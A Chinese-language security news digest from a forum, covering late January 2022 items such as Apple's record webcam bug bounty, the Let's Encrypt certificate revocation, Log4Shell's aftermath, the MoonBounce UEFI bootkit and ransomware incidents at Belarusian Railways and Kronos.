首页
社区
课程
招聘
[推荐]【每日资讯】 | 苹果向发现Mac摄像头漏洞的学生黑客支付创纪录的100500美元奖励 | 2022年1月28日 星期五
发表于: 2022-1-3 10:34 11996

[推荐]【每日资讯】 | 苹果向发现Mac摄像头漏洞的学生黑客支付创纪录的100500美元奖励 | 2022年1月28日 星期五

2022-1-3 10:34
11996

2022年1月28日 星期五

今日资讯速览:

1、苹果向发现Mac摄像头漏洞的学生黑客支付创纪录的100500美元奖励


2、诺贝尔颁奖典礼直播网站遭遇DDoS攻击


3、半数北美企业高管与雇员收到过黑客提出的协助发起勒索软件攻击请求



1、苹果向发现Mac摄像头漏洞的学生黑客支付创纪录的100500美元奖励

一名网络安全学生向苹果公司展示了黑掉Mac摄像头后如何让设备对黑客完全开放,他因此从该公司的错误赏金计划中获得了100500美元。之前发现iPhone和Mac摄像头漏洞的Ryan Pickren,获得了据信是苹果公司最大的漏洞赏金支付。

46669-91011-000-lead-Webcam-d2-xl.jpg

据Pickren称,新的摄像头漏洞涉及Safari和iCloud的一系列安全问题,苹果现在已经完全修复了它们,但在设备被修补之前,恶意网站依然可以利用这些问题发起攻击。


黑客会让攻击者完全访问所有基于网络的账户,从iCloud到PayPal,以及使用麦克风、摄像头和屏幕共享的权限。然而,如果黑客希望偷窥摄像头拍摄的内容,其常规绿灯仍会正常亮起。


Pickren报告说,同样的黑客攻击最终意味着攻击者可以获得对设备整个文件系统的完全访问。


苹果公司没有对该漏洞发表评论,也不知道它是否被外部积极利用。但苹果已经从其漏洞赏金计划中向皮克伦支付了100500美元,这是史上最大的一笔漏洞奖金。该公司曾公布每一类安全问题报告的最高金额清单,漏洞悬赏计划的正式奖励金额最高可达100万美元。


因此,未来苹果公司支付给白帽黑客的金额有可能超过Pickren的100500美元。然而,该公司以前曾因支付的金额低于自己的最高限额,以及对报告的漏洞进行修补的速度缓慢而受到一些批评。

【阅读原文】



2、诺贝尔颁奖典礼直播网站遭遇DDoS攻击

诺贝尔基金会和挪威诺贝尔研究所近日披露了在2021年12月10日的颁奖典礼上展开的网络攻击。


诺贝尔奖是一项年度奖项,授予那些在物理学、化学、生理学、医学、文学和和平领域做出杰出贡献的人。


2021年的诺贝尔奖颁奖典礼在奥斯陆和斯德哥尔摩进行现场直播,据透露,负责直播的官方网站遭到DDoS攻击,“网络攻击使网站承受了极高的负载,试图阻止我们更新和发布有关诺贝尔奖和诺贝尔奖获得者成就的新信息的能力。”诺贝尔基金会官网的公告指出:“因此,诺贝尔基金会和挪威诺贝尔研究所认为这是对诺贝尔奖的严重攻击,并已向警方报告,以帮助提高对此类网络攻击的认识。”


目前,没有关于这次网络攻击的幕后攻击者的信息,但不排除国家黑客的可能。


诺贝尔基金会因一再的偏见和偏袒而受到批评,被指控对来自特定国家的科学家持不公平的立场。


例如,印度仅12次获奖,俄罗斯仅32次获奖,日本仅29次。


另一方面,美国个人获奖398次,英国获奖137次,德国获奖111次,法国获奖70次。


此外,诺贝尔奖授予委员会还曾因忽略在获奖研究中有关键贡献的研究人员,以及忽视开创性发现而将奖项授予相对价值较小的发现而多次受到批评。


因此,鉴于原本备受推崇的诺贝尔基金会引发越来越多的政治争议,国家黑客参与攻击也就不足为奇了。

【阅读原文】



3、半数北美企业高管与雇员收到过黑客提出的协助发起勒索软件攻击请求

为应对近年来不断增长的勒索软件攻击,越来越多的企业 IT 高管和员工,已经收到了专业人士的相关安全建议。Hitachi ID 刚刚公布了针对北美企业的最新调查报告,其中强调了内外部的 IT 安全措施需求。可知有 65% 的受访者表示,他们有被黑客接近,试图引诱他们参与谋划针对自家企业的勒索软件攻击。

(来自:Hitachi ID)


与 2021 年 11 月的调查数据相比,这一比例增加了 17% 。只有 27% 的受访者表示其从未接触过,另有 8% 的人回答“不确定”。

据悉,黑客会尝试利用现金或比特币来贿赂内鬼。金额通常不超过 50 万美元,但也有一小部分会超过百万。

约有半数受访者会向联邦执法部门上报攻击者的这一企图,另有 18% 的人会向内外部汇报。

此外 38% 受访者表示其公司受到过勒索软件攻击,且那些试图被收买的人,后来几乎一半都成为了勒索软件攻击的受害者。

最后,大多数“攻击请求”(59%)是通过电子邮件渗透进来的,其余还包括电话 / 社交媒体。

半数受访者表示他们对来自内部和外部的安全威胁表示关切;

另有超过 1/3 的受访者表示只担心来自外部的安全威胁。

【阅读原文】



2022年1月27日 星期四

今日资讯速览:

1、调查:勒索软件团伙正在加大力度招募内部人员来协助攻击


2、Let’s Encrypt错误签发数百万张证书 所有错误证书将在5天内吊销


3、现阶段Log4Shell漏洞未被大规模利用 但风波会持续数年



1、调查:勒索软件团伙正在加大力度招募内部人员来协助攻击


最近对100家大型(超过5000名员工)北美IT公司的调查显示,勒索软件行为者正在做出更大努力以招募目标公司的内部人员来协助攻击。这项调查是由Hitachi ID进行的,该公司在2021年11月进行了类似的研究。跟上一次调查相比,提供金钱以协助对其雇主进行勒索软件攻击的员工数量增加了17%。


最具体的是,65%的调查对象表示,在2021年12月7日和2022年1月4日之间,他们或他们的员工被找来帮助黑客建立初始访问。

在大多数情况下,威胁行为者使用电子邮件和社交媒体来联系员工,但27%的接近工作是通过电话进行的,这是一种直接且厚颜无耻的联系手段。

至于提供给员工的钱,大多数人收到的报价低于50万美元,但有些提议是在100万美元以上。

在这些案例中,有一半的勒索软件团伙甚至在没有任何内部人员帮助的情况下攻击了目标公司。

这表明,一旦一个公司成为勒索软件攻击的候选者,剩下的就是探索潜在的方法,从而使渗透更容易并更不可能被发现。


一个被忽视的领域

正如调查的结果所反映的那样,内部威胁在制定网络安全计划时通常被忽视、低估并且没有被考虑到。

当IT主管被问及他们对内部威胁的关注程度时,36%的人回答说更关注外部威胁,3%的人根本不担心威胁。

自去年夏天LockBit 2.0勒索软件行动公开邀请流氓员工帮助他们获得企业网络访问权以来,围绕这一问题的意识已经提高,但问题依然存在。

CISA在2021年9月发布了一个工具,它可以帮助企业评估他们对内部威胁的立场,并警告说这个特殊的趋势正在上升。

决定在这个问题上有所作为的实体增加了员工培训并向关键领域的员工发送假的电子邮件。然而,大多数还没有实施具体的安全措施来遏制这个问题。


理想的时机

美国正在经历一个被称为“大辞职”的辞职潮,这一事实提高了勒索软件行为者在这些奇特的谈判中的成功几率。

今天,许多公司的员工处于辞职的边缘或已经决定离开,但在等待合适的时机,一个涉及大笔资金的意外提议对一些人来说可能是诱人的。

越来越多的人感到压力过大、工资过低、遭到剥削、疲惫不堪或觉得工作不再值得他们花时间和精力。

这些人可能被视为勒索软件团伙的理想人选,这些团伙会以高额报酬诱惑他们成为短期帮凶。

【阅读原文】



2、Let’s Encrypt错误签发数百万张证书 所有错误证书将在5天内吊销


提醒:如果你使用Let’s Encrypt提供的免费SSL证书,请检查你提交申请时留的邮箱,如果邮箱收到来自Let’s Encrypt的通知则你的证书很可能会在未来5天内被吊销。


如果你当时留的邮箱是随便填写的,那么基于稳妥考虑建议你重新申请并签发证书,确保旧证书不会被自动吊销。


吊销工作将从国际协调时2022年1月28日16:00开始(UTC +0,下同),最迟会在5天内完成吊销,如果快的话那么最近签发的错误证书很可能很快就会被吊销。

吊销原因:

根据Let’s Encrypt发布的公告,第三方仓库Boulder向ISRG(Let’s Encrypt的运营方)发出通知,该机构使用的ALPN TLS验证存在两个违规问题,因此ISRG必须对其TLS-APLN-01质询验证的工作方式进行更改。


Let’s Encrypt工程师称在2022年1月26日00:48部署修复程序时发现,所有通过TLS-APLN-01质询颁发和验证的证书都是错误的。根据Let’s Encrypt Certificate Policy政策要求,证书颁发机构需在5天内让错误证书失效,Let’s Encrypt计划从2022年1月28日16:00开始吊销错误证书。


但请注意,并非所有证书都受此问题影响,Let’s Encrypt仅会撤销受影响的错误证书,当前已经向相关用户发送邮件通知。


Let’s Encrypt预计少于1%的活跃证书受此问题影响,但考虑到Let’s Encrypt活跃证书超过2.21亿张,即便是1%也影响数百万张证书,这对应着数百万个网站和网络服务。一旦证书被吊销HTTPS将出现连接失败,也就是直接导致网站或服务无法连接。


潜在处理方法:

比较简单直接的处理方法就是直接删除旧的Let’s Encrypt证书然后重新申请签发新证书,由于修复程序已经被部署因此新签发的证书是木有问题的,这样解决比较简单有效。因为Let’s Encrypt没有提供方法来验证证书是否是错误的,所以如果用户没预留真实邮箱或未收到通知邮件不知道自己的证书是否受影响。


宝塔面板用户可在网站设置的SSL中,先关闭SSL功能,然后在证书夹中删除Let’s Encrypt证书,最后重新申请签发即可。


使用LNMP用户操作方法类似,先将网站配置文件(.conf)中的SSL证书码注释掉,然后将证书存放路径里的证书(.cer以及.key)删除,重启nginx使之生效,最后重新使用ACME或cerbot申请新证书即可。


有关此问题的官方公告:

https://community.letsencrypt.org/t/2022-01-25-issue-with-tls-alpn-01-validation-method/170450

【阅读原文】



3、现阶段Log4Shell漏洞未被大规模利用 但风波会持续数年


反恶意软件公司 Sophos 在最新博文中对 Log4Shell 漏洞发表了评论,虽然现阶段并没有出现用户担心的大规模漏洞利用情况,但是深埋在许多数字应用和产品中的 Log4Shell 漏洞很可能会在未来几年内成为被利用的目标。

Sophos 认为,攻击者大规模利用 Log4Shell 的直接威胁被避免了,因为该漏洞的严重性使数字和安全社区团结起来,激励人们采取行动。这一点在 2000 年的千年虫事件中就已经体现出来了,在本次 Log4Shell 事件似乎也起到了很大的作用。

一旦 Log4Shell 漏洞的细节变得清晰,世界上最大和最重要的云服务、软件包和企业就会采取行动,在安全社区的共享威胁情报和实际指导的支持下远离危险。


该公司指出,在 12 月 20 日至 23 日期间,被其防火墙阻止的 Log4Shell 攻击达到顶峰,然后在 1 月期间逐渐减少。Sophos 认为高数字是由于人们试图通过寻找暴露的系统来衡量事情有多糟糕,以及多余的扫描尝试不同的方式来利用不同的应用程序


在最初的几天里,扫描量是适中的,反映了概念验证漏洞的早期发展和对可利用系统的初步在线扫描。在一个星期内,扫描检测量明显增加,数字在2021年12月20日和12月23日之间达到高峰。


Sophos 指出,到今年 1 月只有"少数"客户受到 Log4j 入侵的尝试,其中大多数是挖矿用户。与千年虫的恐慌有一些相似之处。在这两种情况下,工程师处理问题的行动无疑拯救了许多组织。没有发生完全的 IT 崩溃,让世界其他地方的人怀疑,"嗯,有那么糟糕吗?"


然而,正如 Sophos 所观察到的,仅仅因为我们已经绕过了眼前的冰山,这并不意味着我们已经摆脱了风险,在未来几年会持续有黑客利用这些漏洞发起攻击。

千年虫事件让人们看到了几十年前的编码做法,而Log4Shell漏洞则让人们清楚地看到,一些公司是多么依赖他们甚至不知道、没有贡献或没有支持合同的开源组件。

【阅读原文】



2022年1月26日 星期三

今日资讯速览:

1、去年共记录1862起数据泄漏事件 刷新历史记录


2、卡巴斯基曝光新型bootkit恶意软件威胁 无法通过重装或换硬盘解决


3、黑客称入侵了白俄罗斯国营铁路系统网络 以阻止俄罗斯的军事集结



1、去年共记录1862起数据泄漏事件 刷新历史记录

根据 Identity Theft Resource Center 发布的《2021 Data Breach Report》,在过去一年中共发生了 1862 起数据泄露事件,刷新了 2020 年(1108 起)和 2017 年(1506 起)的最高记录。这些数字反映了过去一年高调的网络攻击,其目标从国家最大的石油管道到受托保管数百万美国消费者个人信息的公司。

kivbeea7.webp

ITRC 的总裁兼首席执行官 Eva Velasquez 称数据泄露事件的数量“令人震惊”。在一份声明中写道:“在 2022 年数据泄露事件可能会继续这种趋势。随着各种规模的组织努力捍卫他们所持有的数据,每个人都必须践行良好的网络卫生,以保护自己和他们的亲人免受这些犯罪的影响”。


涉及敏感信息(如社会安全号码)的违规事件比例从前一年的 80% 略微上升到 83%,但仍然大大低于 2017 年 95% 的记录。好的方面是,去年受数据泄露影响的人数下降了约 5%,达到 2.94 亿。但ITRC将这种下降归因于网络犯罪分子的重点转向更小、更集中的攻击,而不是大规模的数据盗窃。


该中心还指出,涉及勒索软件的攻击在过去两年中每年都增加一倍,占2021年报告的网络攻击总数的22%。ITRC表示,按照这种增长速度,勒索软件将超过网络钓鱼,成为今年数据泄露的首要原因。


按部门划分,除了军事部门去年没有报告数据泄露外,所有领域的数据泄露数量都有所增加。增幅最大的是制造业和公用事业,其违规事件的数量增加了一倍多。

【阅读原文】



2、卡巴斯基曝光新型bootkit恶意软件威胁 无法通过重装或换硬盘解决

卡巴斯基安全研究人员周四报道称,他们刚刚发现了一种会感染计算机 UEFI 固件的新型 bootkit 威胁。据悉,同类 bootkit 通常会将代码放到硬盘的 EFI 系统分区。但糟糕的是,受害者无法通过简单操作来移除 New MoonBounce UEFI bootkit —— 因为它感染的是主板上的 SPI 缺陷存储区。

1.png

MoonBounce 感染流程(图自:Kaspersky 官网)


卡巴斯基在近日的一篇 SecureList 文章中写道,作为其迄今接触到的第三个 UEFI bootkit 威胁(前两个是 LoJax 和 MosaicRegressor),该 bootkit 会感染并存储于 SPI 区域。


随着 MoonBounce 的曝光,研究人员还在最近几个月里了解到了其它 UEFI 引导包(ESPectre、FinSpy 等)。这意味着此前无法通过 UEFI 做到的事情,现在正在逐渐成为“新常态”。


比如传统 bootkit 威胁可尝试通过重装系统或更换硬盘来轻松规避,而 MoonBounce 则必须刷新 SPI 存储区(操作相当复杂)或换主板。


至于 MoonBounce 本身,研究发现它已被用于维持对受感染主机的访问、并在后续的(第二阶段)恶意软件部署过程中发挥各种可执行的特性。

2.png

庆幸的是,目前卡巴斯基仅在某家运输服务企业的网络上看到一次 MoonBounce 部署、且基于部署在受感染的网络上的其它恶意软件而实现。


通过一番调查分析,其认为制作者很可能来自 APT41 。此外受害者网络上发现的其它恶意软件,也被发现与同一服务基础设施开展通信,意味其很可能借此来接收指令。


剩下的问题是,该 bootkit 最初到底是如何被安装的?如上图所示,wbemcomn.dll 文件中被附加了 IAT 条目,可在 WMI 服务启动时强制加载 Stealth Vector 。


有鉴于此,卡巴斯基团队建议 IT 管理员定期更新 UEFI 固件、并验证 BootGuard(如果适用)是否已启用。有条件的话,更可借助 TPM 可信平台模块来加强硬件保障。

【阅读原文】



3、黑客称入侵了白俄罗斯国营铁路系统网络 以阻止俄罗斯的军事集结

据Ars Technica报道,白俄罗斯的黑客周一表示,他们用勒索软件感染了该国国营铁路系统的网络,只有在白俄罗斯总统亚历山大·卢卡申科在停止援助俄罗斯军队的情况下,才会提供解密密钥。

一个自称 Cyber Partisans的组织在Telegram上提到白俄罗斯铁路系统网络时写道:

白俄罗斯铁路公司在恐怖分子卢卡申科的指挥下,这些天允许占领军进入我们的土地。作为“Peklo”网络运动的一部分,我们对BelZhD的大部分服务器、数据库和工作站进行了加密,以减缓和破坏该公路的运行。备份已被破坏。

数十个数据库遭到网络攻击,包括AS-Sledd、AS-USOGDP、SAP、AC-Pred、pass.rw.by、uprava、IRC等。

⚠️自动化和安全系统故意不受网络攻击的影响,以避免出现紧急情况。

该组织还在Twitter上宣布了这次攻击:

该组织的一名代表在私信中说,Peklo网络活动针对特定实体和政府经营的公司,目的是向白俄罗斯政府施压,要求其释放政治犯,并阻止俄罗斯军队进入白俄罗斯,利用其地盘对乌克兰进行攻击。


“政府继续压制白俄罗斯人的自由意志,监禁无辜的人,他们继续非法关押......成千上万的政治犯,”该代表写道。“主要目标是推翻卢卡申科政权,保持主权,建立一个有法治、独立机构和保护人权的民主国家。”


该组织发布了以下图片,这些图片似乎显示了黑客入侵了白俄罗斯铁路的网络。

在这个帖子发布时,白俄罗斯铁路公司网站上的一些服务无法使用。例如,在线购票不工作,而是返回以下信息:

88.jpg

由于技术原因,白俄罗斯铁路公司的参考网络资源和签发电子旅行文件的服务暂时无法使用。如需安排旅行和归还电子旅行文件,请联系售票处。目前,正在进行恢复系统性能的工作。白俄罗斯铁路公司对造成的不便表示歉意。

该代表说,除了售票和调度被破坏,网络攻击还影响了货运列车。


据报道,俄罗斯一直在通过铁路向与乌克兰接壤的白俄罗斯运送军事装备和人员。追踪5512公里铁路活动的白俄罗斯铁路工人团体@belzhd_live周五说,在一周的时间里,超过33辆满载装备和部队的俄罗斯军用列车抵达白俄罗斯,在那里进行联合战略演习。该工人团体当时说,它预计在未来几天内共有200个所谓的梯队抵达。

9.png

《华盛顿邮报》称,白俄罗斯国防部周一报告说,在下个月的大型训练演习之前,俄罗斯军队继续抵达该国。周一,社交媒体上还出现了视频,显示俄罗斯军队的车队和载有军事装备的火车在俄罗斯南部和白俄罗斯境内移动。


安全公司SentinelOne的首席威胁研究员Juan Andrés Guerrero-Saade说,他无法确认勒索软件的攻击,但提供的图像似乎证实有人获得了白俄罗斯铁路公司网络的特权访问。


他在接受采访时说:“从表面上看,这是勒索软件叙述中一个有趣的转变。大多数时候,我们认为勒索软件是企业的财务问题,而不是相当于革命斗争中劣势者的工具。”


Cyber Partisans的代表说,进入白俄罗斯铁路公司的网络并不难。


“这个网络有许多入口,而且没有很好地与互联网隔离,”这位代表说。“Cyber Partisans从其中一个点进入,然后从内部打开许多其他入口。”

【阅读原文】



2022年1月25日 星期二

今日资讯速览:

1、电动汽车充电站曝出大量安全漏洞


2、勒索凶猛!美国数千家公司工资难以发放,供应商瘫痪超1个月


3、遭整治之后 “扫码点餐”强制获取个人隐私行为收敛了吗?



1、电动汽车充电站曝出大量安全漏洞


随着道路上电动汽车数量不断增加,对电动汽车充电桩/站和充电站联网管理系统的需求也在增加。然而,这些管理系统正面临着一个潜伏的杀手:网络攻击。


电动汽车充电站的盲区:网络攻击


最新的安全研究显示,电动车充电基础设施存在大量安全漏洞。UTSA网络安全与分析中心主任Elias Bou-Harb和他的同事——迪拜大学的Claud Fachkha和蒙特利尔康考迪亚大学的Tony Nasr、Sadegh Torabi和Chadi Assim在一篇论文中调查并分析了这些漏洞,同时还给出了安全加固的建议。


全球主流的电动汽车管理系统(EVCSMS)需要通过互联网执行关键任务,例如远程监控和客户计费,越来越多的互联网电动汽车充电站也是如此。


在最新的研究项目中,Bou-Harb和他的同事就网络攻击对电动汽车充电系统的现实影响,以及如何缓解这些网络安全威胁进行了研究。该团队还评估了被利用的电动车充电站系统将如何攻击电网等关键基础设施。


“电动汽车是当今社会的新常态。然而,很少有人知道电动汽车的充电站非常容易受到安全漏洞的影响。”Bou-Harb说。“在这项工作中,我们努力发现它们相关的安全漏洞,并了解它们对电动汽车和智能电网的影响,同时提供建议并与相关行业分享我们的发现,以进行主动安全补救。”


13个高危漏洞,可危及智能电网


该团队对市场上常见的16个电动汽车充电管理系统按照固件、移动程序和Web应用等不同攻击面进行分类并进行了深入的安全分析。


“我们设计了一种系统查找和收集方法来识别大量电动汽车充电系统,然后利用逆向工程和白盒/黑盒Web应用程序渗透测试技术来执行彻底的漏洞分析。”Bou-Harb说。

图片

图示:研究人员识别和分析联网电动车管理系统的方法


该团队在16个系统中发现了一系列漏洞(下图),其中13个属于严重漏洞,例如缺少身份验证和跨站点脚本。通过利用这些漏洞,攻击者可能会导致一些问题,包括操纵固件或将自己伪装成实际用户以及访问用户数据。

图片

根据研究人员最近的一份白皮书,“虽然可以对电动汽车生态系统中的各种实体实施多种手段的攻击,但在这项工作中,我们专注于调查可对充电站及其用户和所连接的电网产生严重影响的大规模攻击。”


在论文中,研究团队为电动车管理系统的开发人员制定了多项安全措施、指南和最佳实践,以减轻网络攻击,还制定了对策来修补上述发现的每个漏洞。


为了防止对电网的大规模攻击,研究人员建议开发人员尽快修补现有漏洞,同时在充电站制造过程的初始阶段就整合安全措施:

图片

“电动车安全领域许多行业成员已经承认我们发现的漏洞。”Bou-Harb介绍:“这些信息将有助于对充电站进行安全加固,以保护公众和关键基础设施,并为电动汽车和智能电网的未来安全解决方案提供建议。”

【阅读原文】



2、勒索凶猛!美国数千家公司工资难以发放,供应商瘫痪超1个月

专门提供劳动力与人力资本管理解决方案的美国克罗诺斯(Kronos)公司私有云平台遭勒索软件攻击至今已一月有余,但混乱仍在数百万人中蔓延。美国纽约城区超过两万名公共交通从业人员、克里夫兰市公共服务部门工作人员、联邦快递和全食超市员工以及全美各地大量医疗人员等均未能逃脱。


克罗诺斯系统的客户包括特斯拉、彪马等很多大型跨国公司,以及各种卫生、公共部门和知名大学、基督教青年会等组织,以及餐馆和零售商等小型企业。2021年12月11日,该系统遭遇黑客勒索软件攻击,至今仍未能彻底恢复。由于云平台无法使用,从曼哈顿到佛罗里达的多家公司受到影响。很多公司日程安排陷入混乱,员工们纷纷抱怨自己的工资账单出现了数百甚至数千美元的短缺。


克罗诺斯母公司UKG集团(Ultimate Kronos Group)宣称,受攻击系统有望于1月底恢复正常运营,但客户却对此信心不足。有客户表示,即使系统按时恢复,公司面临的繁重工作也不会随之结束——在服务中断的一个月甚至更长时间里,账务和人事部门均积累了大量记录和报告,必须以手工形式录入克罗诺斯系统。此举甚至有可能导致W-2及其他税务信息的延迟发布。


克利夫兰市首席人力资源官保罗・帕顿(Paul Patton)无奈地表示,“我只能说勒索软件攻击的时间点选择非常敏感。年终岁尾,税务部门和普通民众都非常关心他们的账单,但(克罗诺斯)却瘫痪了。”为纠正本市8000余名公务人员的薪酬差错,克利夫兰专门设立了一间由行政工作人员组成的“作战室”。但帕顿认为效果并不明显,因为要做的工作太多了。


克罗诺斯系统瘫痪造成的影响是巨大的。包括纽约大都会运输署(MTA)在内的部分用户正在考虑对其发起诉讼或修改与UKG集团的合同条款。大都会运输署发言人尤因・莱斯尼克(Eugene Resnick)表示,MTA已完成发起诉讼的第一阶段工作。


黑客入侵极大扰乱公私部门正常运转


由于勒索软件攻击,数千家使用克罗诺斯系统的用户被迫下线,其中包括联邦快递、百事公司、全食超市等美国大型私人企业,以及马里兰州乔治王子郡、尤他大学等公共部门。波及的雇员人数多达800万人。


在新墨西哥州首府圣菲达市,从图书馆到警察局和消防队的几乎所有政府雇员都受到了克罗诺斯系统瘫痪的影响。该市首席信息安全官布莱德利・普尔迪(Bradley Purdy)说,大部分政府雇员为了记录工作时间,不得不每隔两小时就手工填写一次电子表格。往常这个工作都是通过各部门定制的云平台软件完成的。


其他受影响的城市也开始启用各种繁琐的手工作业。部分机构和部门要求雇员每两周提交谷歌报表,另一些被波及的克罗诺斯用户则干脆要求员工通过电子邮件每小时提交一次工作表格。


“我们都快被逼疯了,”普尔迪说。


为尽可能正确地发放薪酬,克利夫兰市选择了估算方式,将员工的计划工作时长或者上次的薪酬发放记录作为此次薪酬发放住所。但短缺现象仍然难以避免,特别是那些曾经加班或在节假日工作的员工,都会发现自己的薪酬账单出现缺斤短两的现象。按联邦劳工法的规定,出现薪酬发放错误的公司应该在故障恢复后对错误进行纠正。


医疗部门受影响最大


克罗诺斯系统瘫痪给医疗部门和机构带来了“前所未有”的负面影响。


美国医院协会(American Hospital Association)网络安全与风险高级顾问约翰・瑞吉(John Riggi)表示,美国境内有很大一部分医院及医疗机构受到了克罗诺斯系统瘫痪的影响,其中既包括偏远地区的小型医院,也包括由多家医院组成的大城市综合医疗体。“特别是在当前新冠病毒奥密克戎变种对医院构成冲击的情况下,局面会变得更加糟糕,”瑞吉说。克罗诺斯系统的功能之一是帮助24小时运营的医疗机构进行复杂的员工工作安排,一旦瘫痪会让工作陷入混乱。


另外,医疗系统员工薪酬发放出现错误也是克罗诺斯系统瘫痪带来的负面影响。虽然医院或医疗机构尽可能为员工发放正确薪酬,但错误仍在所难免,导致员工纷纷通过工会、社交媒体或本地新闻媒体吐槽或曝光。


佛罗里达大学医疗健康机构员工通过当地电视台的新闻频道吐槽,称本人已六周没有收到加班或节假日补贴了。蒙大拿密索拉社区医疗中心(Missoula"s Community Medical Center)的250名护士则给当地媒体《密苏拉人报》写信,批评机构管理层依据去年12月初的发放记录发放本月薪金,导致自己本应得到的薪酬被遗漏。


尽管医院或医疗机构都承诺,故障一旦恢复便立即纠正薪酬发放过程中出现的错误,但对依靠薪酬生活的普通员工来说,无法及时得到加班或节假日工作补贴将给生活带来很多麻烦,即使最终得到弥补也留有遗憾。如果克罗诺斯系统的故障无法得到及时恢复,局面可能变得更混乱——收到错误薪酬的员工可能不会再忍受下去,选择跳槽到其他运转正常的医疗机构。


瑞吉和美国医院协会承认,尽管勒索软件攻击者应该对目前的混乱局面负主要责任,但UKG集团的运营也令人失望。“一旦受到攻击,会在多大程度上对用户造成干扰,以及数据有没有初始备份终是不透明的,这是我们对克罗诺斯系统的失望之处,” 瑞吉说。


UKG集团含糊其辞


UKG集团在勒索软件攻击的细节问题——攻击是如何发生的,谁应该对此负责,始终三缄其口。只是表示“应该与近期发现的Log4j漏洞无关。该集团在去年12月中旬攻击刚刚发生后的声明中表示,“我们正在与网络安全专家合作,采取断然措施对问题进行调查和解决,并及时向政府做了通报。”

据悉,UKG集团已雇佣知名网络安全公司Mandiant调查此次勒索软件攻击事件,并雇佣了West Monroe数字咨询公司负责系统恢复工作。


易得手的美妙目标


对私营公司来说,勒索软件和其他网络攻击正变得越来越常见。专家表示,类似UKG集团这样的在全国范围内为用户提供应用软件的公司如今正面临着持续不断的网络攻击危险。拜登总统已将打击网络犯罪列为任期内的优先事项,美国司法部去年对两起勒索软件犯罪提起了诉讼。


从事网络安全的Axio公司CEO斯科特・坎瑞(Scott Kannry)说,勒索软件攻击者的目的是最大限度地攫取赎金。在他们眼中,UKG这样的劳动管理软件供应商是“易得手的美妙目标”。


“节假日期间系统出现故障对某些用户来说无法忍受,所以(攻击者)有非常大的机率勒索到一张大额支票,”他说。


虽然UKG已开始系统恢复工作,但新一轮的麻烦很快就会到来:司法程序和法律诉讼正等着他们。这些诉讼有的来自用户,比如纽约大都会运输署;有的来自用户雇佣的员工,比如匹兹堡艾勒翰尼综合医院(Allegheny General Hospital)的员工拉里・克洛克(Larry Kroeck)。克洛克曾向上级投诉自己的账单上少了54个小时的薪金,后者告诉他“目前什么都做不了,有2000多个人有与你同样的问题”。克洛克遂对UKG集团和自己工作的医院发起诉讼。


黑客活动可能会对个人信息构成潜在威胁


佛罗里达南区法院上周接到一起集体诉讼,对UKG集团由于“未能保证个人身份信息安全”造成的损失索赔超500万美元。


UKG集团的很多用户都提醒本公司员工,他们的部分个人信息——包括姓名、联系方法以及其他基础雇佣数据,很可能已落入勒索软件攻击者手中。具体有哪些信息被盗取,得看公司使用了哪种类型的克罗诺斯软件。


对有些人来说,身份信息泄漏的程度非常严重。比如克利夫兰市就向工作人员发出警报,提醒他们的社会保障卡号码后四位已经被黑客窃取。


目前UKG集团拒绝就诉讼问题做出回应,其发言人只是表示“一切正在调查中。我们正与网络安全专家合作,确定敏感用户的信息是否泄漏,以及泄漏到了哪种程度”。


也许UKG集团在事件最后只会损失部分客户,不会惹上官司纠纷。“通常来说,遭遇勒索软件攻击只会使名声受损,”普尔迪说。劳动管理软件的客户群体通常具备很强的“粘”性,不会轻易放弃正在使用的软件而转投其竞争对手。但专家认为此次勒索软件攻击造成的影响可能会让客户三思而行。


“就算他们最终仍然选择克罗诺斯,也会对合同内容进行仔细斟酌,”普尔迪说。

【阅读原文】



3、遭整治之后 “扫码点餐”强制获取个人隐私行为收敛了吗?


扫码、关注公众号、获取微信头像和昵称、授权手机号……只有当这些步骤都完成后,才可以开始“正事”——点餐。2021年12月18日,上海市消保委发布消息,称腾讯公司向开发者推送了关于自查“扫码点餐强制关注公众号”问题的通知。


通知表示,微信平台提醒开发者自查是否存在“扫码点餐强制关注公众号”问题,并及时进行整改,平台将于 2022 年1月17日开始对此类问题进行核查,违规的公众号将被限制二维码打开公众号功能。对于消费者而言,从1月17日开始,就应该不会被强制关注公众号才能点餐。


图源:网络


2021年3月,《IT时报》记者随机走访沪上近十家餐厅时发现,大多数餐厅都需要在扫码点餐之前进行关注、授权都一系列动作,有的甚至还要注册会员,否则无法进入点餐页面。


现在,这种现象是否有所改观?


01 个别商家仍强制点餐用户授权


1月17日,《IT时报》记者走访了近十家以提供简餐为主的餐厅,发现多数餐厅一改往日“强制授权”的风格,给了消费者“拒绝”的权力。


在一家中式简餐餐厅,当记者扫描桌上的二维码后,页面上出现了“点我授权”的字样,点击“点我授权”之后,和此前一样,页面上出现了要求记者授权微信昵称和头像的提示,但是当点击“拒绝”之后,页面并没有像往常一样停止不动,而是询问几人用餐,并跳转到了点餐页面,支付完成之后就可以下单了。


随后,记者又来到去年走访过的一家西式简餐厅,去年的情况是如果不同意授权,页面就始终停留在小程序首页,无法点餐。这次,《IT时报》记者扫了桌上的二维码,页面上出现“授权微信手机号”的提示,但是在提示下方,多了“暂时跳过”的选项,点击“暂时跳过”,进入点餐页面,同样能顺利点餐。



在不少商家的扫码点餐过程中,都有“申请获取微信绑定的手机号”这一步,页面上显示这是为“认证会员信息或作为自提菜品凭证”,但如果不授权,并不会影响取餐。


不过,并不是所有的商家都已经取消了“强制授权”,当天,《IT时报》记者在浦东两家连锁牛肉面馆点餐时还是遇到了“不授权无法点餐”的情况。在其中一家面馆扫码点餐时,页面上出现了“用户登录”和“取消”两个选择,当选择“取消”之后,虽然跳转到了点餐页面,但点击“堂食点餐”,页面又返回到此前的登录界面。如果要登录,需要授权微信头像和昵称。同样,在另一家牛肉面馆,点餐时要求授权微信头像和昵称,如果拒绝,就无法继续点餐。


02转战小程序、企微引流


扫码点餐能迅速“走红”的原因,除了降低人工成本,餐厅更希望通过扫码点餐获取的顾客信息和会员,其带来的私域和公域流量能让商家后续进行各种有针对性的营销活动,顾客在离店之后也会收到商家的各种推送,提高转化率。


“现在扫码点餐的确不能强制要求顾客授权各种信息了,也不能强制关注,后续营销没以前那么方便了。”一些扫码点餐系统供应商向《IT时报》记者坦言。


关注公众号、成为会员、商家进行会员营销,这是此前不少商家的常规操作手法。“现在和此前最大的区别就是获取顾客手机号没那么容易了。”一扫码点餐系统供应商销售人员程女士告诉《IT时报》记者,因此,现在大多数餐厅会通过扫码领券、抢红包、积分兑换等活动让顾客留下手机号,成为会员。


某餐厅登录后即可享受会员福利


